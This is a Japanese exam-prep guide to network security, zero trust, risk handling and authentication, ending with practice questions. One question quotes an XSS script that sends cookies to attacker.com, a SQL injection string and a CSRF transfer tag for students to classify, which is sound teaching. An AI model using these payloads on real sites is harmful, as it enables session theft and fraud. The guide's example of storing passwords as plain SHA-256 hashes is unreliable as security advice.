ファイアウォールネットワーク最外側ネットワークパケットの出入りを制御防止組織全体のネットワークISP の境界、データセンター入口
IDS (Intrusion Detection System)ネットワーク内(監視)不正なトラフィックパターンを検知するだけ(ブロックなし)検知ネットワーク全体管理者への通知、ログ記録
IPS (Intrusion Prevention System)ネットワーク内(能動的)不正なトラフィックを検知して自動的にブロック防止ネットワーク全体疑わしいセッションを即座に遮断
WAF (Web Application Firewall)Web サーバー前面HTTP/HTTPS レベルの攻撃(SQL インジェクション、XSS など)を検知・ブロック防止Web アプリケーションCDN レイヤー、ロードバランサー
DMZ (Demilitarized Zone)ネットワーク構成インターネット公開サーバ(Web、メールなど)を内部ネットワークから分離防止公開サーバWeb サーバの隔離ネットワーク
VPN (Virtual Private Network)通信経路インターネット上に暗号化されたトンネルを構築し、安全な通信を実現防止リモートアクセス、支社間通信リモートワーク、国際拠点間
UTM (Unified Threat Management)ネットワーク境界ファイアウォール、IPS、メールフィルタ、Web フィルタなどを 1 つの機器で統合防止ネットワーク全体中堅企業の入口機器
サンドボックスホスト / クラウド隔離された仮想環境で、疑わしいファイルやプログラムを安全に実行・検査検知マルウェア検出メール添付ファイル検査
EDR (Endpoint Detection and Response)クライアント / サーバPC やサーバ上の疑わしい活動をリアルタイム監視し、異常を検知・対応検知・対応端末(PC、サーバ)エージェント型セキュリティソフト
SIEM (Security Information and Event Management)集約・監視ネットワーク全体のログを一元収集し、相関分析で脅威パターンを検知検知全体監視・分析セキュリティ監視センター(SOC)

各層の防御の位置づけ

インターネット

[ファイアウォール] ← 第 1 の防御線

[IDS / IPS] ← 第 2 の防御線(ネットワークレベル)

[DMZ] ← 公開サーバはここに配置

[WAF] ← 第 3 の防御線(Web レベル)

[Web サーバ、データベース]

[EDR] ← 第 4 の防御線(エンドポイント)

[SIEM] ← 全体監視(すべてのログを集約)

IDS と IPS の違い

これは試験頻出です:

  • IDS:警報機。火災を検知して「火事です!」と通知するだけ
  • IPS:消火装置。火災を検知して、自動的に消火器を噴く

IDS は過検知が多いこともあり、分析技術者の判断に頼りますが、IPS は設定がシビアです(誤検知で正常な通信もブロックする可能性)。

IDS / IPS / EDR / SIEM を 1 枚で切る

過去問では、全部セキュリティ監視製品 に見える選択肢が並びます。ここは 何を見ているかその場で止めるか で切ると安定します。

技術主戦場何をするか自動遮断合図になる語
IDSネットワーク不審な通信を検知して通知する基本はしない検知、通知、アラート
IPSネットワーク不審な通信を検知し、その場で遮断するするブロック、遮断、インライン
EDR端末端末内の挙動を監視し、感染後の不審動作を検知・隔離する対応するエージェント、隔離、端末、感染後
SIEM組織全体複数機器のログを集約し、相関分析で異常を見つける基本はしないログ集約、相関分析、SOC

IDS / IPS通信 を見る技術、EDR端末上の挙動 を見る技術、SIEM全体ログをまとめて見る 技術です。EDR があるから SIEM は不要 ではなく、EDR のログを SIEM に集約して全体像を把握する使い方もあります。

EPP / EDR / DLP を役割で分ける

端末対策の設問では、侵入を防ぐ侵入後に見つけて動く情報を外へ出さない が混ざりやすいです。

技術中心目的典型機能合図になる語
EPP侵入を防ぐアンチウイルス、シグネチャ検知、実行前ブロックウイルス対策ソフト、予防、侵入防止
EDR侵入後を見つけて対応する挙動監視、隔離、調査、復旧支援異常挙動、隔離、追跡、感染後
DLP情報の持出しを防ぐメール添付検査、USB 制御、機密データ検知持出し防止、情報漏えい、USB、送信制御

EPP予防EDR検出と初動対応DLP情報が外へ出る経路の制御 です。ランサムウェアに感染した後の不審通信を止める なら EDR、個人情報ファイルのメール送信を止める なら DLP を疑ってください。

VPN の種類

VPN は、公開回線(インターネット)上で暗号化された仮想的なプライベートネットワークを構築します。

VPN 種類何をつなぐか典型用途特徴
IPsec VPN拠点やルータ同士本社-支社接続、拠点間通信ネットワーク層で暗号化し、機器同士で常時接続しやすい
SSL VPN個人端末と社内システム在宅勤務、外出先からの接続SSL/TLS を使い、ブラウザや専用クライアントで使いやすい
IP-VPN拠点間の閉域網企業ネットワークの広域接続通信事業者が閉域網として提供し、インターネット直結より管理しやすい

VPN 種別を利用場面で切る

VPN という語だけ見て 1 つの技術だと思うと、支社間接続在宅勤務 を同じ説明で処理してしまいます。まずは 誰と誰をつなぐか を見てください。

問題文の言い方まず疑う技術理由
本社と支社のネットワークを常時つなぐIPsec VPN または IP-VPN拠点間接続の話だから
社員が自宅や外出先から社内へ入るSSL VPN個人端末のリモートアクセスだから
通信事業者の閉域網で結ぶIP-VPNキャリア提供サービスの話だから
ブラウザ中心で安全に社内システムへ入るSSL VPN利用者側の利便性が重視されているから

IPsec VPNIP-VPN はどちらも拠点間で使われますが、前者は 暗号化トンネル技術、後者は 通信事業者の閉域網サービス です。

VPN 方式と仮想デスクトップ方式を分けて考える

テレワークの設問では、VPN仮想デスクトップ を同じ箱に入れる誤答が頻出です。ここは 通信路の保護作業環境の置き場所 を分けます。

方式本質端末側で何が動くかデータの残り方
VPN 方式社内ネットワークへ安全に入る手元端末から社内サーバや業務システムへ直接アクセスする設定次第では端末側にも残りうる
仮想デスクトップ方式社内やクラウド上のデスクトップを遠隔操作する画面転送で作業し、実体は遠隔側で動く端末側に残しにくい

VPN安全な通路仮想デスクトップどこで仕事の画面や処理を動かすか の話です。VPN を使う仮想デスクトップ もあり得るので、互いに排他的な分類として覚えないでください。

テレワーク方式を 1 枚で切る

総務省のテレワークセキュリティガイドラインでも、テレワーク方式は複数に分けて整理されています。試験では名前が似た方式を取り違えやすいので、端末に何を残すかどこで業務アプリが動くか で切るのが安全です。

方式何が本質か端末側にアプリやデータが残るか向いている場面
VPN 方式社内ネットワークへ安全に入る残りうるオフィス内と近い業務をそのまま使いたい
リモートデスクトップ方式オフィス内 PC の画面を遠隔操作する残しにくいオフィス設置端末をそのまま使いたい
仮想デスクトップ(VDI)方式仮想デスクトップ基盤上の環境を遠隔操作する残しにくい遠隔環境を集中的に管理したい
セキュアコンテナ方式端末内に業務専用の隔離領域を作るコンテナ内に限定して残るBYOD で業務領域だけ分けたい
セキュアブラウザ方式特殊ブラウザ経由で業務システムへ入る制御しやすいが製品仕様次第Web アプリ中心の業務
クラウドサービス方式オフィス網に入らずクラウドへ直接接続するクラウド側中心SaaS 中心で完結する業務

迷ったら、安全な通路 の話なら VPN、オフィス PC を触る ならリモートデスクトップ、VDI 基盤を触る なら仮想デスクトップ、端末内に業務専用の箱を作る ならセキュアコンテナ、特殊ブラウザ ならセキュアブラウザ、最初からクラウドへ直接入る ならクラウドサービス方式です。

モバイル端末管理と BYOD

テレワークやスマートフォン活用が進むと、誰の端末を業務に使うかどう統制するか を分けて考える必要があります。試験では、BYOD / COPE は運用方針MCM / MDM は管理技術 という切り分けができるかが問われます。

用語意味長所注意点
BYOD従業員個人の端末を業務利用する導入コストを抑えやすい私物と業務データが混在しやすい
COPE会社所有端末を私的利用込みで貸与する会社側で端末統制しやすい端末費用は会社負担
MCM文書・コンテンツを管理する仕組みファイルの暗号化や持出し制御に向く端末全体の設定管理までは行わない
MDM端末そのものを管理する仕組み遠隔ロック、設定配布、アプリ制御が可能個人利用との摩擦が生じやすい

判断のコツは、所有者 を問うなら BYOD / COPE、何を管理するか を問うなら MCM / MDM です。たとえば「個人スマホの業務ファイルだけを統制したい」なら BYOD + MCM が自然な組み合わせになります。

BYOD / COPE / MDM / MCM を組み合わせで切る

端末管理の設問では、誰の端末か何を制御したいか を分けると正答しやすくなります。

状況まず決める観点自然な答え理由
従業員の私物スマホを業務利用したい端末の所有者BYOD個人所有端末の業務利用だから
会社支給スマホを私用も含めて使わせたい端末の所有者COPE会社所有端末を貸与する考え方だから
端末紛失時に遠隔ロックやワイプをしたい管理対象MDM端末全体の設定や制御を行うから
業務文書だけ暗号化し、私物領域とは分けたい管理対象MCMコンテンツ単位の保護が中心だから
私物スマホで業務ファイルだけ厳格に統制したい所有者 + 管理対象BYOD + MCM私物利用を認めつつ、業務データだけ守るから
会社支給端末を一括配布し、設定も強制したい所有者 + 管理対象COPE + MDM会社端末を端末単位で統制するから

リモートワイプパスコード強制アプリ配布 が出れば MDM、文書の持出し制御閲覧範囲制御 が出れば MCM を疑います。BYOD と COPE は管理技術ではなく、端末所有と利用方針の話です。

ゼロトラスト

ゼロトラストとは、「社内ネットワークだから安全」という前提を捨て、「すべてを不信頼と仮定し、毎回検証する」というセキュリティ考え方です。

なぜゼロトラストが必要になったのか

従来の「境界型防御」は以下を想定していました:

  • 会社の内側は信頼できる従業員だけ
  • ファイアウォールで外部を遮断したら、内側は安全

しかし、現代では以下の理由でこの前提が崩壊しました:

  1. テレワーク拡大 → 従業員が自宅や外出先から接続。「社内」という概念が曖昧化
  2. クラウド利用 → データや業務システムが社内データセンター外に分散
  3. 内部脅威 → 不満を持つ従業員による情報盗取、マルウェア感染した社員 PC
  4. サプライチェーン攻撃 → 取引先の PC 経由で侵入される可能性

従来型(境界型防御)vs ゼロトラスト

観点従来型(境界型防御)ゼロトラスト
基本方針「社内 = 安全、社外 = 危険」と仮定「何も信頼しない(Never Trust, Always Verify)」と仮定
初回認証後認証済みなら、その後は検証しない毎回ユーザーとデバイスを検証
ネットワーク分割単純(内部ネットワーク / 外部)細かくセグメント化(ユーザー単位、部門単位など)
アクセス権限「このユーザーは営業部だから」で広く付与「このユーザーが この 特定データ にアクセスすることが必要か」で毎回判定
適用対象ネットワーク境界のみユーザー、デバイス、アプリケーション、データ
実装技術ファイアウォール、VPNMFA、EDR、IAM、暗号化、SIEM

具体例で比較

従来型防御:

社員 A が会社ネットワークにログイン
  → 認証成功
  → その後、何日も何度もアクセスしても確認なし
  → PC がマルウェア感染しても検知されない可能性

ゼロトラスト:

社員 A がアクセスを試みる
  → パスワード確認
  → 指紋認証確認
  → デバイスのセキュリティ状態確認(マルウェア感染していないか)
  → 「このユーザーがこのデータにアクセスする権限があるか」確認
  → すべて成功したらアクセス許可
  → 30 分後、別のファイルにアクセス → 上記を再度確認

ゼロトラストの 7 つの基本原則

原則説明実装例
1. 検証を前提にするすべてのユーザー、デバイス、通信を検証(何度も)初回ログイン、リソース毎のアクセス時に認証・認可を実施
2. 最小権限の原則必要最小限のアクセス権限のみ付与営業 A さんは営業部のデータにのみアクセス可能(全社データは不可)
3. マイクロセグメンテーションネットワークを細かく分割し、セグメント間の通信を厳格に管理データベースサーバへのアクセスは特定の業務用 PC からのみ許可
4. 継続的な監視すべてのアクセスログ、通信ログを監視し、異常を検知「通常と異なるアクセスパターン」を SIEM で自動検知
5. 多要素認証MFA を必須にし、パスワード単独では認証しないパスワード + 指紋 + セキュリティキー など
6. デバイスセキュリティPC やスマートフォンのセキュリティ状態を確認してからアクセス許可EDR でマルウェア感染を検知、感染時はアクセス遮断
7. データ保護暗号化、アクセス制御で重要データを保護機密ファイルは AES-256 で暗号化、アクセス権限は IAM で管理

ゼロトラストと従来型防御の使い分け

  • 従来型防御:中小企業や従業員が少ない組織、クラウド利用が少ない場合
  • ゼロトラスト:大企業、テレワーク多用、クラウド多用、金融機関など

ゼロトラストと VPN / SSO / MFA の関係

ゼロトラストは製品名ではなく、どう守るか の考え方です。そのため、VPNSSO と同列の単一技術として覚えると崩れます。

用語位置づけ何をするかゼロトラストとの関係
ゼロトラストセキュリティの考え方毎回検証し、最小権限で扱う中心となる方針そのもの
VPN通信路を保護する技術公開回線上に安全なトンネルを作る使ってもよいが、それだけでは不十分
SSO認証体験をまとめる仕組み一度の認証で複数システムへ入る利便性向上に有効だが、単独ではゼロトラストにならない
MFA認証強化の方法異なる要素を組み合わせるゼロトラスト実装の重要要素
EDR / IAM / SIEM運用・監視技術端末監視、権限制御、ログ分析ゼロトラストを支える実装技術

VPN を導入したからゼロトラスト ではなく、VPN に加えてユーザー・端末・権限を継続検証する 方向ならゼロトラストです。SSO で再ログインが減る ことと 毎回のアクセスを細かく判定する ことも別の話として切り分けてください。

ISMS とセキュリティ関連規格

規格 / 基準概要対象
ISO/IEC 27001情報セキュリティマネジメントシステム(ISMS)の要件組織全体
ISO/IEC 27002ISO 27001 の管理策(コントロール)の詳細ガイドライン対策設計
個人情報保護方針ガイドライン個人情報取扱事業者向けのガイドライン個人情報
FISC(金融情報システムセンター)安全対策基準金融機関向けのセキュリティ基準金融機関
NIST Cybersecurity Frameworkサイバーセキュリティフレームワーク(米国)リスク管理

JIS Q 27000 系でのリスクマネジメントの流れ

JIS Q 27000 系では、セキュリティ対策を「思いついた順に実装する」のではなく、リスクを特定し、分析し、評価し、対応し、見直す という順で進めます。試験では、この順序を逆にした選択肢が典型的な誤りです。

段階何をするか誤りやすい点
リスク特定情報資産、脅威、脆弱性を洗い出す脅威だけ見て、守る資産を整理しない
リスク分析発生可能性と影響度を把握する感覚だけで大小を決める
リスク評価優先順位を決める分析と評価を同じものだと思う
リスク対応回避・低減・移転・受容を選ぶすべて低減しようとしてしまう
監視・見直し対策後も継続的に点検する一度決めたら終わりと考える

対応策の4類型も頻出です。

  • 回避:その業務や仕組み自体をやめる
  • 低減:MFA、WAF、教育などで確率や影響を下げる
  • 移転:保険、外部委託、契約で責任を分ける
  • 受容:コストに見合わない場合は受け入れて監視する

受験では、対策の前に評価がある評価の前に特定と分析がある という流れを言えるようにしてください。

リスク対応 4 類型を 1 枚で切る

過去問では、保険加入システム廃止教育強化対策しない を並べて、回避 / 低減 / 移転 / 受容 を取り違えさせます。ここは リスクを減らすのかやめるのか他者に経済的負担を移すのか受け入れるのか で切ってください。

類型何をするか典型例見分けるコツ
回避リスク源そのものをなくす危険な業務をやめる、高リスク機能を廃止するやらない止める が合図
低減発生確率や影響を下げるMFA、WAF、教育、バックアップ減らす抑える が合図
移転損失や責任の一部を他者へ移す保険加入、外部委託、契約分担保険委託補償 が合図
受容対策せず意識的に受け入れる軽微なリスクを監視だけして受け入れる許容範囲受け入れる が合図

保険加入は基本的に 移転 と覚える のが安全です。保険に入っても事故自体が消えるわけではないので、残余リスクは残ります。何もしない放置受容 は同じではなく、分析したうえで受け入れる のが受容です。

リスク分析アプローチの 4 類型

過去問では、ベースライン非形式的詳細リスク分析組み合わせ の違いを問う問題が出ています。ここでは名前ではなく、どれだけ厳密に分析するか で整理します。

アプローチ考え方向いている場面注意点
ベースラインアプローチ業界標準や社内基準を基準線として、必要な管理策を当てるまず最低限の水準をそろえたいとき個別事情の深掘りは弱い
非形式的アプローチ経験や専門家判断でリスクを見積もる小規模組織、迅速な判断属人化しやすい
詳細リスク分析資産・脅威・脆弱性・発生可能性・影響を丁寧に分析する重要資産、金融・インフラ系時間とコストがかかる
組み合わせアプローチベースラインと詳細分析を対象に応じて併用する実務で最も現実的どこを詳細化するかの設計が必要

試験では、ベースライン = 基準と照合詳細 = 資産ごとに深く分析組み合わせ = 両方を併用 と切れるようにしておくと十分です。

典型的なつまずき

暗号化とハッシュを混同する

「どちらも元のデータを隠すのでは?」という誤解が生じやすいです。

特徴暗号化ハッシュ関数
復号化できるかできる(秘密鍵で復号化可能)できない(一方向)
用途データを秘密にしたいデータが改ざんされていないか確認
パスワード送信時、メールの内容を隠すパスワード保存、ファイル完全性確認
長さ入力と同じ長さ(または長め)常に固定長(SHA-256 なら常に 256 ビット)

試験で聞かれたら

  • 「データベースに保存されているのが abc123SHA-256(abc123) のどちらか」と聞かれたら「ハッシュ値」
  • 「通信データを秘密にしたい」なら「暗号化」

デジタル署名の鍵の役割を逆に覚える

暗号化と署名で秘密鍵と公開鍵の使用順序が逆という点は必ず混同されます。

試験対策:「送信者が秘密鍵を使うのが署名、受信者が秘密鍵を使うのが暗号化」と覚えてください。

処理暗号化デジタル署名
ステップ 1受信者の公開鍵で暗号化ハッシュ値を計算
ステップ 2-送信者の秘密鍵で暗号化(署名)
ステップ 3受信者の秘密鍵で復号化受信者が送信者の公開鍵で復号化
誰が秘密鍵を使うか受信者送信者

「暗号化は受信者を守り、署名は送信者を証明する」という考え方が理解の鍵です。

認証と認可を混同する

試験ではこの 2 つを別々に問われることが多いです。

観点認証 (Authentication)認可 (Authorization)
意味「あなたが本当にその人ですか?」「その人は何ができますか?」
実装例ログイン画面でパスワード入力 → 本人確認ログイン後、閲覧可能なページが限定される
失敗時ログイン失敗ログイン成功だがアクセス拒否
「Aさんであることを証明する」「Aさん(営業部)は営業部のデータのみ閲覧可能」

試験で聞かれたら

  • 「パスワード + MFA」なら認証
  • 「このユーザーは何ができるか」なら認可

Web 攻撃(SQL インジェクション・XSS・CSRF)の攻撃対象を見落とす

この 3 つは一見似ていますが、「何を狙うのか」が全く異なります。

攻撃攻撃対象悪用するもの防御策が異なる理由
SQL インジェクションサーバー側のデータベース入力フォームの脆弱性DB のレイヤーで防ぐ必要
XSS他のユーザーのブラウザ入力フォームの脆弱性ブラウザの実行環境で防ぐ必要
CSRF認証済みユーザーのセッションCookie の自動送信リクエストの正当性を検証

試験で聞かれたら

  • 「全ユーザー情報が表示された」→ SQL インジェクション
  • 「別のユーザーのデータが盗まれた」→ XSS
  • 「気付かずに送金された」→ CSRF

IDS と IPS の役割を混同する

「どちらも不正アクセスを対象にしているのでは?」という誤解が生じやすいです。

特徴IDSIPS
役割検知のみ(警報)検知 + ブロック(自動防御)
リアルタイム対応なし(管理者に通知)あり(即座に遮断)
誤検知の影響通知が増えるだけ正常通信もブロックされる可能性
導入難度低い高い(設定が難しい)

実生活の例

  • IDS = 監視カメラ(不正な人を見つけて記録)
  • IPS = 警備員(不正な人を見つけて即座に追い出す)

ファイアウォールは万能ではない

「ファイアウォールがあれば安全」は誤りです。

ファイアウォールが防げるもの:

  • 正当性のないネットワークからの接続
  • ブロック対象ポートへのアクセス

ファイアウォールが防げないもの:

  • 内部脅威(従業員による盗取、USB メモリの持ち出し)
  • 社内ネットワーク経由の攻撃(感染した社員 PC からの拡散)
  • アプリケーションレベルの攻撃(SQL インジェクションは HTTP ポート 80 を使用、ファイアウォールは通す)
  • ゼロデイ脆弱性(未発見の脆弱性を使った攻撃)

だからこそ、IDS/IPS、WAF、EDR など複数層の防御が必要です。

多要素認証と多段階認証の違い

「複数の認証」と言っても、質が違います。

方式特徴強度
多段階認証同じ要素を複数回パスワード → セキュリティの質問 → メール認証(すべて知識)低い
多要素認証(MFA)異なる要素を組み合わせパスワード(知識) + SMS コード(所持)高い

試験では「パスワード + 秘密の質問は多要素認証か」と聞かれたら「いいえ」と答えてください(どちらも知識要素)。

正解例

  • 知識 + 所持 = MFA
  • 知識 + 生体 = MFA
  • 所持 + 生体 = MFA
  • 知識 + 知識 = MFA ではない(多段階認証)

OAuth 2.0 を『ログイン方式そのもの』と短絡する

Google でログイン という表現だけで OAuth 2.0 を選ぶのは危険です。

問われていること代表技術
本人確認した結果を使ってログインさせたいOpenID Connect、SAML
他サービスの API を限定的に使わせたいOAuth 2.0
社員情報を管理したいLDAP

OAuth 2.0 は 何ができるかを委ねる 仕組みで、本人確認そのものとは別です。問題文に アクセス権限トークン外部アプリ連携 があれば OAuth 2.0、ログイン認証済みユーザーID トークン があれば OpenID Connect を疑ってください。

パスキーと OTP と SSO を同じ『ログイン技術』として覚える

同じログイン画面の話に見えても、役割は別です。

用語中心機能
パスキーパスワードの代わりに本人確認する
OTP認証を追加で強める
SSO一度の認証結果を使い回す

SMSで6桁コードが届く なら OTP、一度の認証で複数システムに入れる なら SSO、端末に保存された認証情報でパスワードなしに入る ならパスキーです。

問題を解くときの観点

試験では、セキュリティの問題が多角的に出題されます。「どの視点から考えるか」を決めることで、正答率が上がります。

視点 1:「何を守るのか」で分類

問われたもの考える観点
機密性データを隠す「通信を盗聴されない」= 暗号化
完全性データが改ざんされていない「ファイルが改ざんされていないか確認」= ハッシュ関数
可用性システムが使える「攻撃でシステムが止まらない」= IDS/IPS、ファイアウォール
真正性相手が本物か確認「本当にその人か」= 認証、デジタル署名
否認防止送信者が否定できない「送ったメールについて後で否定されない」= デジタル署名

問題で「守るべき対象」が明示されていたら、上記の表で該当要素を見つけてください。

視点 2:「どの技術で守るのか」で分類

技術用途見分けポイント
暗号化データを秘密にする「復号化できる」「鍵が必要」
ハッシュ関数改ざん検知「復号化できない」「一方向」「固定長」
デジタル署名出所証明と否認防止「秘密鍵で署名」「公開鍵で検証」
電子証明書公開鍵の持ち主を証明「有効期限」「認証局」「証明書」
PKI公開鍵を信頼して使う体制「認証局」「失効管理」「証明書の検証」
認証本人確認「ユーザーが本人か確認」
FIDO / パスキーパスワードレス認証「公開鍵」「認証器」「パスワード不要」
タイムスタンプ存在時刻と改ざん有無の証明「いつ存在したか」「時刻証明」
CRL / OCSP証明書の失効確認「失効したか」「有効性確認」
ファイアウォールネットワークフィルタ「パケットの出入り制御」「ポート制限」
IDS/IPSトラフィック監視「攻撃パターンを検知」
WAFWeb 攻撃対策「SQL インジェクション、XSS 対策」
X-Frame-Optionsクリックジャッキング対策「frame 埋め込み禁止」「iframe」
CSPブラウザ側のスクリプト実行制御「レスポンスヘッダ」「読み込み元制限」
SameSiteCookie の越境送信制御「Cookie 属性」「クロスサイト」「CSRF」
EPP端末の侵入予防「ウイルス対策ソフト」「予防」
EDR端末監視と初動対応「エージェント」「隔離」「感染後」
DLP情報持ち出し防止「送信制御」「USB」「機密情報」
SIEMログ集約と相関分析「SOC」「ログ一元収集」「全体監視」

視点 3:「鍵の個数」が問われたら

与えられた条件計算式判断ポイント
「n 人が相互通信」+ 共通鍵n(n-1)/2「ペアごとに異なる鍵」が必要
「n 人が相互通信」+ 公開鍵2n「各人が公開鍵 1 + 秘密鍵 1」を持つ

判断のコツ

  • 問題文に「各ペアごとに異なる鍵」とあれば共通鍵
  • 問題文に「公開鍵が必要」とあれば公開鍵

視点 3.5:「認証方式の種類」が問われたら

方式何を手掛かりに切るか典型キーワード
多要素認証異なる要素の組み合わせか知識 + 所持、生体、MFA
ワンタイムパスワード毎回違う使い捨て値かOTP、ワンタイム、認証アプリ
チャレンジレスポンス秘密を直接送らず、乱数への応答で証明するかチャレンジ、レスポンス、乱数
リスクベース認証普段と違う環境だけ追加確認するか端末、場所、時間、追加認証
シングルサインオン一度の認証で複数サービスへ行けるかSSO、チケット、複数システム

認証そのもの を聞いているのか、認証を強める方式 を聞いているのか、認証後の利便性 を聞いているのかを先に見てください。

視点 3.6:「認証基盤のどの層か」が問われたら

問われ方中心になる技術切り分けのコツ
ユーザー情報の台帳や属性管理LDAPID、部署、メールアドレスなどを管理する
ネットワーク接続時の認証要求RADIUSWi-Fi、VPN、アクセスサーバが合図
チケットで再認証負荷を下げるKerberosチケット、相互認証、AD 環境が合図
認証済みという結果を他サービスへ渡すSAML / OpenID ConnectSSO、アサーション、ID トークンが合図
他サービスへの限定アクセスを許可するOAuth 2.0権限委譲、アクセストークン、API 連携が合図

本人確認権限委譲利用者情報管理 は別レイヤーです。問題文に 誰であるかを証明何をしてよいかを許可 のどちらが書かれているかを先に読むと、OAuth と OpenID Connect を取り違えにくくなります。

視点 3.7:「リスク対応 4 類型」が問われたら

選択肢の言い方中心になる類型切り分けのコツ
その業務や機能をやめる回避リスク源を消している
教育や対策で確率を下げる低減発生確率や影響を下げている
保険や契約で損失負担を分ける移転経済的な負担や責任を他者へ移す
分析して許容範囲なので受け入れる受容対策しないことを意識的に選ぶ

保険 が出たら基本は 移転低リスクなので受け入れる受容 と覚えてください。何もしない放置受容 は同じではありません。

視点 4:「脅威と対策」の対応関係

脅威攻撃対象対策技術見分けポイント
SQL インジェクションDBプリペアドステートメント「データベースの不正操作」
XSSブラウザエスケープ処理、CSP「他のユーザーが被害」
CSRFセッションCSRF トークン「認証済みユーザーの権限を悪用」
クリックジャッキング画面上の操作X-Frame-Options、frame-ancestors「iframe を重ねる」
DDoSサーバー可用性IPS、WAF、ロードバランサ「大量のリクエストで停止」
フィッシングユーザーメール認証、ユーザー教育「偽サイトに誘導」
ランサムウェアファイルバックアップ、EDR「データを暗号化して身代金要求」

視点 5:「対策技術の層」で分類

レイヤー対策技術
ネットワーク層ファイアウォール、IDS/IPS不正パケットをブロック
アプリケーション層WAFSQL インジェクション、XSS をブロック
エンドポイント層EPP、EDR、アンチウイルスPC 上の侵入予防や不正活動の検知
データ保護層DLP機密情報の持出しを抑止
全体監視SIEM複数システムのログを統合分析

問題で「どのレイヤーで防ぐべきか」と問われたら、上記の表で該当技術を見つけてください。

視点 5.5:「VPN の種類とテレワーク方式」が問われたら

問い方中心になる語切り分けのコツ
拠点同士のネットワーク接続IPsec VPN / IP-VPNルータ閉域網 が合図
個人の在宅勤務接続SSL VPNブラウザ外出先個人端末 が合図
安全な通路を作る話VPN通信路の保護を聞いている
遠隔側のデスクトップを操作する話仮想デスクトップ方式作業環境の置き場所を聞いている

VPN は通信を守る技術で、仮想デスクトップ は作業環境の配置方法です。VPN を使った仮想デスクトップ もあり得るため、二者択一で考えないのがコツです。

視点 6:「従来型防御 vs ゼロトラスト」

観点従来型防御ゼロトラスト
適用場面ローカルネットワーク、社内 VPNテレワーク、クラウド活用
認証のタイミングネットワーク進入時のみアクセスのたびに毎回
信頼の前提社内は信頼何も信頼しない
対象ネットワーク境界ユーザー、デバイス、データ

問題で「テレワーク多用」「クラウド」とあれば、ゼロトラストが答えの可能性が高いです。

確認問題

確認問題 1:鍵の個数計算

ある企業が 5 支社で情報共有システムを構築します。支社間通信の暗号化について、次の 2 つのシナリオで必要な鍵の本数(個数)を計算してください。

(1)各支社が共通鍵暗号で 1 対 1 に安全に通信する場合、必要な鍵は何本か。

(2)各支社が公開鍵暗号を使用する場合、必要な鍵(公開鍵 + 秘密鍵)は何個か。

(3)共通鍵の鍵配送問題とは何か、簡潔に説明してください。


解答例

(1)共通鍵暗号:各ペアに異なる鍵が必要

  • ペアの数 = C(5,2) = 5 × 4 ÷ 2 = 10 本
  • なぜなら、A-B、A-C、A-D、A-E、B-C、B-D、B-E、C-D、C-E、D-E のそれぞれに異なる秘密鍵が必要
  • A と B の鍵を C とは共有できない(共有したら C がいつでも A-B の通信を盗聴可能)

(2)公開鍵暗号:各支社が公開鍵 1 つ + 秘密鍵 1 つ

  • 鍵の個数 = 2 × 5 = 10 個
  • 支社数に関わらず、全支社が全支社と安全に通信できる
  • A-B 間、A-C 間、B-C 間など、すべて B の公開鍵(または C の公開鍵)で通信可能

(3)鍵配送問題

  • 共通鍵暗号では、秘密鍵を事前に「安全に」交換する必要がある
  • しかし、インターネットを経由して鍵を送ると、通信中に盗聴される可能性がある
  • 物理的に渡す方法もあるが、支社が増えると管理が複雑になる
  • ⇒ これが「鍵配送問題」

確認問題 2:暗号化とハッシュ関数の使い分け

次の 4 つのシナリオで、「暗号化」「ハッシュ関数」のどちらを使用すべきか、理由とともに答えてください。

(A)メールの内容を他人が読めないようにしたい

(B)ダウンロード前後でファイルが改ざんされていないか確認したい

(C)ユーザーのパスワードをデータベースに保存したい

(D)2 つのファイルが同じ内容であることを高速に確認したい


解答例

(A)暗号化を使用

  • 理由:メール内容を秘密にする必要がある(機密性)
  • 受信者が復号化して元の内容を読む必要がある

(B)ハッシュ関数を使用

  • 理由:改ざん検知が目的(完全性確認)
  • ハッシュ値を比較するだけで十分。復号化の必要なし

(C)ハッシュ関数を使用

  • 理由:ハッキングされても元のパスワードを復元されない(一方向だから)
  • SHA-256(ユーザー入力) をデータベースに保存
  • ログイン時:入力値をハッシュ化して、保存値と比較

(D)ハッシュ関数を使用

  • 理由:高速(暗号化より計算量が少ない)
  • ハッシュ値が異なれば、ファイルが異なることが確実

確認問題 3:デジタル署名の 5 ステップ

A さんが B さんに重要なドキュメントを送信し、そのドキュメントが A さんから送られたこと(真正性)と改ざんされていないこと(完全性)を証明したいとします。デジタル署名の 5 つのステップを述べ、各ステップで使用する鍵と、その鍵を持っているのが誰かを明記してください。


解答例

ステップ操作使用する鍵鍵の所有者説明
1ドキュメント → ハッシュ関数なしなしドキュメント全体を要約(固定長)
2ハッシュ値 → 秘密鍵で暗号化A の秘密鍵A 本人デジタル署名を生成
3ドキュメント + 署名を送信なしなしB に到達
4受信ドキュメント → ハッシュ関数なしなし新しいハッシュ値を生成
5署名 → A の公開鍵で復号化A の公開鍵世界中に公開復号化値と手順 4 のハッシュ値を比較

検証結果

  • ハッシュ値が一致 → 署名は有効(A が確かに署名した、改ざんなし)
  • ハッシュ値が異なる → 署名無効(改ざんされた、または A が署名していない)

確認問題 4:Web 攻撃の判定と防御策

次の 3 つのシナリオで、(1)どの Web 攻撃か、(2)攻撃対象は何か、(3)有効な防御策は何かを答えてください。

(A)会員サイトのコメント欄に以下が投稿される:<script>window.location='https://attacker.com?cookie='+document.cookie</script>

(B)ショッピングサイトの検索欄に ' OR '1'='1 が入力されると、全商品の情報が表示される

(C)ユーザーが銀行サイトで認証済みの状態で、別タブで攻撃者サイトを訪問。そのサイトに <img src="https://bank.com/transfer?to=attacker&amount=1000000"> が埋め込まれており、自動的に送金される


解答例

(A)XSS(クロスサイトスクリプティング)

  • 攻撃対象:他のユーザーのブラウザ
  • 仕組み:スクリプトがブラウザで実行され、Cookie(セッションID)が盗まれる
  • 防御策:出力時のエスケープ処理、Content-Security-Policy ヘッダ設定、入力値検証

(B)SQL インジェクション

  • 攻撃対象:サーバー側のデータベース
  • 仕組みSELECT * FROM products WHERE name='' OR '1'='1' となり、WHERE 条件が常に真になる
  • 防御策:プリペアドステートメント、入力値検証・サニタイズ

(C)CSRF(クロスサイトリクエストフォージェリ)

  • 攻撃対象:認証済みユーザーのセッション
  • 仕組み:ユーザーが認証済み状態で、別サイトから自動的にリクエストが送信される(Cookie は自動送信される)
  • 防御策:CSRF トークン検証、SameSite クッキー属性設定

確認問題 5:IDS・IPS・ファイアウォール・WAF の役割

次の 4 つのセキュリティ対策について、(1)どこに配置されるか、(2)何を防ぐのか、(3)どのレイヤーで動くのかを答えてください。

(A)ファイアウォール

(B)IDS(侵入検知システム)

(C)IPS(侵入防止システム)

(D)WAF(Web Application Firewall)


解答例

